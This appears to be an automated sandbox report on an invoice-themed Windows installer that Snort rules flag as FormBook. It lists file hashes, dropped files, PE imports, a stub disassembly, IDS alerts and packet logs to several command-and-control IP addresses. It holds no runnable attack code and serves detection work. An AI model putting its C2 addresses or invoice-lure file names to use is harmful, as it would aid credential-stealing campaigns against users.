	U03c2doc.exe	Get hash	malicious	Browse
	QUOTE061021.exe	Get hash	malicious	Browse
	PAYMENT CONFIRMATION.exe	Get hash	malicious	Browse
	PO187439.exe	Get hash	malicious	Browse
	090009000000090.exe	Get hash	malicious	Browse
	NEWORDERLIST.exe	Get hash	malicious	Browse
	00404000004.exe	Get hash	malicious	Browse
	40900900090000.exe	Get hash	malicious	Browse
	INVO090090202.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.Injector.AIC.genEldorado.29599.exe	Get hash	malicious	Browse
	D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe	Get hash	malicious	Browse
	D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Bulz.383129.23206.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Bulz.383129.29566.exe	Get hash	malicious	Browse
	ASAI-LiveCage-Client-Full_Installer-NSS-B-1.5.2.0005 (1).exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\6jlp0t221b5inmotwb6 Download File
Process:	C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
File Type:	data
Category:	dropped
Size (bytes):	164352
Entropy (8bit):	7.998758173527995
Encrypted:	true
SSDEEP:	3072:QT5c8TmXd3cHrOEnBjJYnX/3VOe6PbETLuf3wKW/Hic0bFaj24k9p1C:QT4tcHrnjJGvFOpoT4W/fVip8
MD5:	B0D1F8FE2661BB67EAE722EF05BB2EA6
SHA1:	63478D37EF57D85F0CC92FCBBB3680EEC90FB384
SHA-256:	02ECBE9DFAACA44A385946BF2A10AB675CD3AC64E66811D1333A9EBCBB728A4F
SHA-512:	318172A5D104A9C782D1CCC81F09A67241E85E2EF9E8B2F76661E977DC61B85E373593B4CC3F2BFFC963CC5D98C44BA399197F1E40391FB4513AD718884C2683
Malicious:	false
Reputation:	low
Preview:	./f.t.L.['.3...._2.q.".4.H.#..Nn..J...^Z.wn..f..&...w-..NH`.S.Q.?.v..o...40........o.c...oxy.Z#.(XD.....H8..4.!f...,.B..ok..g..Fq.z..n..)ap.e......7.d.8<.....IB.{...Hkq~..a.\..8.h9.. .4c....+K..$.....M....k..}V.z.8.;..b..P.6....M.....4.Lu.Ifx.e.=wV...q.=i...g..)~W.ca.-..........23.....B.......m..!h.......y...r.@........9G.;m.p<......Yy.j._...W...[.S./.......TU.4....L.}._%j..eW.h...u/-..GT..}.Q..W.h...=4.s..x..j..zU...............,s&..<V>...(.`Xx..x....-3..o.\.Z\|M/.Q+,.~........4.........(hY.O;...p.F...~...).L.....'M.g.@..b...u........{....s.....I......QX..[...i..x..f.J.......$.?.q.-e*..U.y......f..h..2'....1...dJT.._.a...K.c...{.@......id..b..p;..~...........lZ7E..K.e...q...S.....?[......o...9NSx,../..\...B...n.B....T..4...-.......I..L&-.^...........l9...L....fj.G..V........8..<C.L.X....+J..L2...A..@D...`?........)...o..f`...~4.`...T.zH..Y...z]..}=..P..t.[.:.:m.6..r.D...4.8.......6.X.a......+.]..pc@.1..q.<.g..K._..L...rF...

C:\Users\user\AppData\Local\Temp\dceotuvjnitpz Download File
Process:	C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
File Type:	data
Category:	dropped
Size (bytes):	56977
Entropy (8bit):	4.980974364016973
Encrypted:	false
SSDEEP:	1536:kpYDj6sp0NqCBljcLGbeeqr8uXKZnH/E/pl7f3tsfLvE:ScfOQLGbzqb6ZfEP3F
MD5:	EA1030174F35B4071E9655765BDEE0A7
SHA1:	E1DA533CAD9DD79A6CA5567840631492B546FAF1
SHA-256:	EA9A33E85D080A56D1242F112240E1396C45149913A7CBFED0132E0BA171561A
SHA-512:	2DE92DBD68B66527981E28ACCCA0C01676C35A5CCF951A0B429799DBE1BBDEFF86931D3E211891D2EC1A44D19132D45E10ADEC6A56D122BABFFDBF64C540A909
Malicious:	false
Reputation:	low
Preview:	U.......S........b...........%....... .....!.....".....#...a.$...v.%...3.&.....'.....(.....).....*...a.+.....,...a.-.........../.....0.....1.....2.....3...Q.4.....5...4.6.....7...=.8...%.9.....:.....;.....<.....=.....>...A.?.....@.....A...5.B.....C.....D...=.E.....F...I.G.....H.....I.....J...5.K...W.L.....M.....N.....O.....P...5.Q.....R.....S.....T...5.U.....V.....W...=.X.....Y.....Z.....[...=.\.....].....^...4._.....`...U.a.....b.....c.....d.....e.....f...~.g.....h.....i.....j.....k.....l.....m...Y.n.....o.....p...U.q.....r...I.s.....t.....u.....v...Y.w...W.x.....y.....z.....{.....\|...Y.}.....~...............Y.................U.......................U.................4...............................................~.....y.................................................................I.............................W..............................

C:\Users\user\AppData\Local\Temp\nsp24F6.tmp Download File
Process:	C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
File Type:	data
Category:	dropped
Size (bytes):	254631
Entropy (8bit):	7.4186917232920075
Encrypted:	false
SSDEEP:	6144:6GpT4tcHrnjJGvFOpoT4W/fVipc4dL9bRP4t:b4tcLjJG9OpoT4W/fViDdpb58
MD5:	6805AECB719838AC09004E2E0655BDED
SHA1:	5D1F4A1429C20E9105F1800B13E558022FD15294
SHA-256:	A764168E4B558D726EF4AAC92AF20367FB229F7B42AECE6EAB191B4208B5E61B
SHA-512:	4784DB4AA246735148204058EF8F0108E1FB3D49BFDF76CCC15A56E2251E43F54FECFA53C7338F15E9DAF5EA16F53A3A79A5A01DDE95403E395C5F95062D952F
Malicious:	false
Reputation:	low
Preview:	.T......,.......................T=...... S.......S..........................................................................................................................................................................................................................................J...................j...............................................................................................................................\|.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dll Download File
Process:	C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.855045165595541
Encrypted:	false
SSDEEP:	192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
MD5:	FCCFF8CB7A1067E23FD2E2B63971A8E1
SHA1:	30E2A9E137C1223A78A0F7B0BF96A1C361976D91
SHA-256:	6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
SHA-512:	F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse Filename: 3arZKnr21W.exe, Detection: malicious, Browse Filename: Shipping receipt.exe, Detection: malicious, Browse Filename: New Order TL273723734533.pdf.exe, Detection: malicious, Browse Filename: YZ8OvkljWm.exe, Detection: malicious, Browse Filename: U03c2doc.exe, Detection: malicious, Browse Filename: QUOTE061021.exe, Detection: malicious, Browse Filename: PAYMENT CONFIRMATION.exe, Detection: malicious, Browse Filename: PO187439.exe, Detection: malicious, Browse Filename: 090009000000090.exe, Detection: malicious, Browse Filename: NEWORDERLIST.exe, Detection: malicious, Browse Filename: 00404000004.exe, Detection: malicious, Browse Filename: 40900900090000.exe, Detection: malicious, Browse Filename: INVO090090202.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.Injector.AIC.genEldorado.29599.exe, Detection: malicious, Browse Filename: D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe, Detection: malicious, Browse Filename: D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Bulz.383129.23206.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Bulz.383129.29566.exe, Detection: malicious, Browse Filename: ASAI-LiveCage-Client-Full_Installer-NSS-B-1.5.2.0005 (1).exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..\|....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.912934279663738
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Proforma Invoice and Bank swift-REG.PI-0086547654.exe
File size:	223620
MD5:	b148ae414eb8a1b34a15cdb32c21f9ee
SHA1:	25b78f76010cc34843352c78d4f8e07a28b46b32
SHA256:	193788545c12c697fe660e9dd178e5d97478d5b90d5b0096f1cd6a9b641d48e9
SHA512:	9f6efbfdd1ab7bed6e0efcff882fd05816c0cbb6b413abce562f1ab6c8adbfa2d86610299be8d399ba36a305b64cadc762806eaa4c647d9b04fd457ec1537d0a
SSDEEP:	6144:Ds9G4RsUIfpwRmZfqJxbx3jjTQeGYWAaE:yG45IfpTIxV3jHQeGYn
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General
Entrypoint:	0x40323c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	099c0646ea7282d232219f8807883be0

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F58h], eax
call 00007F2D70A73B1Eh
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F458h
call dword ptr [00407158h]
push 004091B8h
push 004236A0h
call 00007F2D70A737D1h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007F2D70A737BFh
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007F2D70A70F1Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F2D70A732B2h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007F2D70A70F75h
cmp cl, 00000020h
jne 00007F2D70A70F18h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F2D70A70F0Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x9e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5a5a	0x5c00	False	0.660453464674	data	6.41769823686	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1190	0x1200	False	0.4453125	data	5.18162709925	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1af98	0x400	False	0.55859375	data	4.70902740305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x24000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x9e0	0xa00	False	0.45625	data	4.51012867721	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2c190	0x2e8	data	English	United States
RT_DIALOG	0x2c478	0x100	data	English	United States
RT_DIALOG	0x2c578	0x11c	data	English	United States
RT_DIALOG	0x2c698	0x60	data	English	United States
RT_GROUP_ICON	0x2c6f8	0x14	data	English	United States
RT_MANIFEST	0x2c710	0x2cc	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/10/21-14:36:44.390894	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49757	80	192.168.2.4	121.254.178.252
06/10/21-14:36:44.390894	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49757	80	192.168.2.4	121.254.178.252
06/10/21-14:36:44.390894	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49757	80	192.168.2.4	121.254.178.252
06/10/21-14:36:54.972333	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49758	80	192.168.2.4	85.159.66.93
06/10/21-14:36:54.972333	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49758	80	192.168.2.4	85.159.66.93
06/10/21-14:36:54.972333	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49758	80	192.168.2.4	85.159.66.93
06/10/21-14:37:10.805521	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49760	23.227.38.74	192.168.2.4
06/10/21-14:37:27.645237	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49764	80	192.168.2.4	35.205.61.67
06/10/21-14:37:27.645237	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49764	80	192.168.2.4	35.205.61.67
06/10/21-14:37:27.645237	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49764	80	192.168.2.4	35.205.61.67
06/10/21-14:37:33.101150	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49765	80	192.168.2.4	37.48.65.148
06/10/21-14:37:33.101150	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49765	80	192.168.2.4	37.48.65.148
06/10/21-14:37:33.101150	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49765	80	192.168.2.4	37.48.65.148

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 14:36:38.054233074 CEST	49756	80	192.168.2.4	104.232.96.207
Jun 10, 2021 14:36:38.250670910 CEST	80	49756	104.232.96.207	192.168.2.4
Jun 10, 2021 14:36:38.250874996 CEST	49756	80	192.168.2.4	104.232.96.207
Jun 10, 2021 14:36:38.251010895 CEST	49756	80	192.168.2.4	104.232.96.207
Jun 10, 2021 14:36:38.752846003 CEST	49756	80	192.168.2.4	104.232.96.207
Jun 10, 2021 14:36:38.846438885 CEST	49756	80	192.168.2.4	104.232.96.207
Jun 10, 2021 14:36:38.965590954 CEST	80	49756	104.232.96.207	192.168.2.4
Jun 10, 2021 14:36:39.060780048 CEST	80	49756	104.232.96.207	192.168.2.4
Jun 10, 2021 14:36:39.060854912 CEST	80	49756	104.232.96.207	192.168.2.4
Jun 10, 2021 14:36:39.060895920 CEST	80	49756	104.232.96.207	192.168.2.4
Jun 10, 2021 14:36:39.060935020 CEST	80	49756	104.232.96.207	192.168.2.4
Jun 10, 2021 14:36:39.060966015 CEST	80	49756	104.232.96.207	192.168.2.4
Jun 10, 2021 14:36:39.061037064 CEST	49756	80	192.168.2.4	104.232.96.207
Jun 10, 2021 14:36:39.061108112 CEST	49756	80	192.168.2.4	104.232.96.207
Jun 10, 2021 14:36:39.061115026 CEST	49756	80	192.168.2.4	104.232.96.207
Jun 10, 2021 14:36:39.061120033 CEST	49756	80	192.168.2.4	104.232.96.207
Jun 10, 2021 14:36:39.061125040 CEST	49756	80	192.168.2.4	104.232.96.207
Jun 10, 2021 14:36:44.118053913 CEST	49757	80	192.168.2.4	121.254.178.252
Jun 10, 2021 14:36:44.390425920 CEST	80	49757	121.254.178.252	192.168.2.4
Jun 10, 2021 14:36:44.390620947 CEST	49757	80	192.168.2.4	121.254.178.252
Jun 10, 2021 14:36:44.390893936 CEST	49757	80	192.168.2.4	121.254.178.252
Jun 10, 2021 14:36:44.662385941 CEST	80	49757	121.254.178.252	192.168.2.4
Jun 10, 2021 14:36:44.664067984 CEST	80	49757	121.254.178.252	192.168.2.4
Jun 10, 2021 14:36:44.664097071 CEST	80	49757	121.254.178.252	192.168.2.4
Jun 10, 2021 14:36:44.664256096 CEST	49757	80	192.168.2.4	121.254.178.252
Jun 10, 2021 14:36:44.664313078 CEST	49757	80	192.168.2.4	121.254.178.252
Jun 10, 2021 14:36:44.935009956 CEST	80	49757	121.254.178.252	192.168.2.4
Jun 10, 2021 14:36:54.897469044 CEST	49758	80	192.168.2.4	85.159.66.93
Jun 10, 2021 14:36:54.971858025 CEST	80	49758	85.159.66.93	192.168.2.4
Jun 10, 2021 14:36:54.972150087 CEST	49758	80	192.168.2.4	85.159.66.93
Jun 10, 2021 14:36:54.972332954 CEST	49758	80	192.168.2.4	85.159.66.93
Jun 10, 2021 14:36:55.049076080 CEST	80	49758	85.159.66.93	192.168.2.4
Jun 10, 2021 14:36:55.049115896 CEST	80	49758	85.159.66.93	192.168.2.4
Jun 10, 2021 14:36:55.049320936 CEST	49758	80	192.168.2.4	85.159.66.93
Jun 10, 2021 14:36:55.049495935 CEST	49758	80	192.168.2.4	85.159.66.93
Jun 10, 2021 14:36:55.124811888 CEST	80	49758	85.159.66.93	192.168.2.4
Jun 10, 2021 14:37:05.140222073 CEST	49759	80	192.168.2.4	162.0.229.108
Jun 10, 2021 14:37:05.328459024 CEST	80	49759	162.0.229.108	192.168.2.4
Jun 10, 2021 14:37:05.328600883 CEST	49759	80	192.168.2.4	162.0.229.108
Jun 10, 2021 14:37:05.328807116 CEST	49759	80	192.168.2.4	162.0.229.108
Jun 10, 2021 14:37:05.531295061 CEST	80	49759	162.0.229.108	192.168.2.4
Jun 10, 2021 14:37:05.531508923 CEST	80	49759	162.0.229.108	192.168.2.4
Jun 10, 2021 14:37:05.531562090 CEST	80	49759	162.0.229.108	192.168.2.4
Jun 10, 2021 14:37:05.531598091 CEST	80	49759	162.0.229.108	192.168.2.4
Jun 10, 2021 14:37:05.531635046 CEST	80	49759	162.0.229.108	192.168.2.4
Jun 10, 2021 14:37:05.531672001 CEST	80	49759	162.0.229.108	192.168.2.4
Jun 10, 2021 14:37:05.531689882 CEST	49759	80	192.168.2.4	162.0.229.108
Jun 10, 2021 14:37:05.531708002 CEST	80	49759	162.0.229.108	192.168.2.4
Jun 10, 2021 14:37:05.531723022 CEST	49759	80	192.168.2.4	162.0.229.108
Jun 10, 2021 14:37:05.531745911 CEST	80	49759	162.0.229.108	192.168.2.4
Jun 10, 2021 14:37:05.531773090 CEST	80	49759	162.0.229.108	192.168.2.4
Jun 10, 2021 14:37:05.531788111 CEST	49759	80	192.168.2.4	162.0.229.108
Jun 10, 2021 14:37:05.531807899 CEST	80	49759	162.0.229.108	192.168.2.4
Jun 10, 2021 14:37:05.531881094 CEST	49759	80	192.168.2.4	162.0.229.108
Jun 10, 2021 14:37:05.531959057 CEST	49759	80	192.168.2.4	162.0.229.108
Jun 10, 2021 14:37:05.720097065 CEST	80	49759	162.0.229.108	192.168.2.4
Jun 10, 2021 14:37:10.645792961 CEST	49760	80	192.168.2.4	23.227.38.74
Jun 10, 2021 14:37:10.688044071 CEST	80	49760	23.227.38.74	192.168.2.4
Jun 10, 2021 14:37:10.688662052 CEST	49760	80	192.168.2.4	23.227.38.74
Jun 10, 2021 14:37:10.715167999 CEST	49760	80	192.168.2.4	23.227.38.74
Jun 10, 2021 14:37:10.757301092 CEST	80	49760	23.227.38.74	192.168.2.4
Jun 10, 2021 14:37:10.805521011 CEST	80	49760	23.227.38.74	192.168.2.4
Jun 10, 2021 14:37:10.805551052 CEST	80	49760	23.227.38.74	192.168.2.4
Jun 10, 2021 14:37:10.805566072 CEST	80	49760	23.227.38.74	192.168.2.4
Jun 10, 2021 14:37:10.805583000 CEST	80	49760	23.227.38.74	192.168.2.4
Jun 10, 2021 14:37:10.805597067 CEST	80	49760	23.227.38.74	192.168.2.4
Jun 10, 2021 14:37:10.805612087 CEST	80	49760	23.227.38.74	192.168.2.4
Jun 10, 2021 14:37:10.805733919 CEST	80	49760	23.227.38.74	192.168.2.4
Jun 10, 2021 14:37:10.805795908 CEST	49760	80	192.168.2.4	23.227.38.74
Jun 10, 2021 14:37:10.805824995 CEST	49760	80	192.168.2.4	23.227.38.74
Jun 10, 2021 14:37:10.805830002 CEST	49760	80	192.168.2.4	23.227.38.74
Jun 10, 2021 14:37:11.285413027 CEST	49760	80	192.168.2.4	23.227.38.74
Jun 10, 2021 14:37:16.834638119 CEST	49763	80	192.168.2.4	69.162.102.218
Jun 10, 2021 14:37:17.003546000 CEST	80	49763	69.162.102.218	192.168.2.4
Jun 10, 2021 14:37:17.003772020 CEST	49763	80	192.168.2.4	69.162.102.218
Jun 10, 2021 14:37:17.004250050 CEST	49763	80	192.168.2.4	69.162.102.218
Jun 10, 2021 14:37:17.171540976 CEST	80	49763	69.162.102.218	192.168.2.4
Jun 10, 2021 14:37:17.173516035 CEST	80	49763	69.162.102.218	192.168.2.4
Jun 10, 2021 14:37:17.173544884 CEST	80	49763	69.162.102.218	192.168.2.4
Jun 10, 2021 14:37:17.173861980 CEST	49763	80	192.168.2.4	69.162.102.218
Jun 10, 2021 14:37:17.173883915 CEST	49763	80	192.168.2.4	69.162.102.218
Jun 10, 2021 14:37:17.341495037 CEST	80	49763	69.162.102.218	192.168.2.4
Jun 10, 2021 14:37:27.348553896 CEST	49764	80	192.168.2.4	35.205.61.67
Jun 10, 2021 14:37:27.644581079 CEST	80	49764	35.205.61.67	192.168.2.4
Jun 10, 2021 14:37:27.644968033 CEST	49764	80	192.168.2.4	35.205.61.67
Jun 10, 2021 14:37:27.645236969 CEST	49764	80	192.168.2.4	35.205.61.67
Jun 10, 2021 14:37:27.931535006 CEST	80	49764	35.205.61.67	192.168.2.4
Jun 10, 2021 14:37:27.931746006 CEST	80	49764	35.205.61.67	192.168.2.4
Jun 10, 2021 14:37:27.931761980 CEST	80	49764	35.205.61.67	192.168.2.4
Jun 10, 2021 14:37:27.932120085 CEST	49764	80	192.168.2.4	35.205.61.67
Jun 10, 2021 14:37:27.932272911 CEST	49764	80	192.168.2.4	35.205.61.67
Jun 10, 2021 14:37:28.215754986 CEST	80	49764	35.205.61.67	192.168.2.4
Jun 10, 2021 14:37:33.049948931 CEST	49765	80	192.168.2.4	37.48.65.148
Jun 10, 2021 14:37:33.100524902 CEST	80	49765	37.48.65.148	192.168.2.4
Jun 10, 2021 14:37:33.100692034 CEST	49765	80	192.168.2.4	37.48.65.148
Jun 10, 2021 14:37:33.101150036 CEST	49765	80	192.168.2.4	37.48.65.148
Jun 10, 2021 14:37:33.153523922 CEST	80	49765	37.48.65.148	192.168.2.4
Jun 10, 2021 14:37:33.179658890 CEST	80	49765	37.48.65.148	192.168.2.4
Jun 10, 2021 14:37:33.180028915 CEST	49765	80	192.168.2.4	37.48.65.148
Jun 10, 2021 14:37:33.601315022 CEST	49765	80	192.168.2.4	37.48.65.148
Jun 10, 2021 14:37:33.653297901 CEST	80	49765	37.48.65.148	192.168.2.4
Jun 10, 2021 14:37:33.930744886 CEST	80	49765	37.48.65.148	192.168.2.4
Jun 10, 2021 14:37:33.931039095 CEST	49765	80	192.168.2.4	37.48.65.148

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 14:35:22.729626894 CEST	65298	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:22.779958963 CEST	53	65298	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:22.783041954 CEST	59123	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:22.860754013 CEST	53	59123	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:23.831338882 CEST	54531	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:23.887283087 CEST	53	54531	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:23.917716980 CEST	49714	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:23.982383013 CEST	53	49714	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:24.975048065 CEST	58028	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:25.024985075 CEST	53	58028	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:26.377013922 CEST	53097	53	192.168.2.4	8.8.8.8
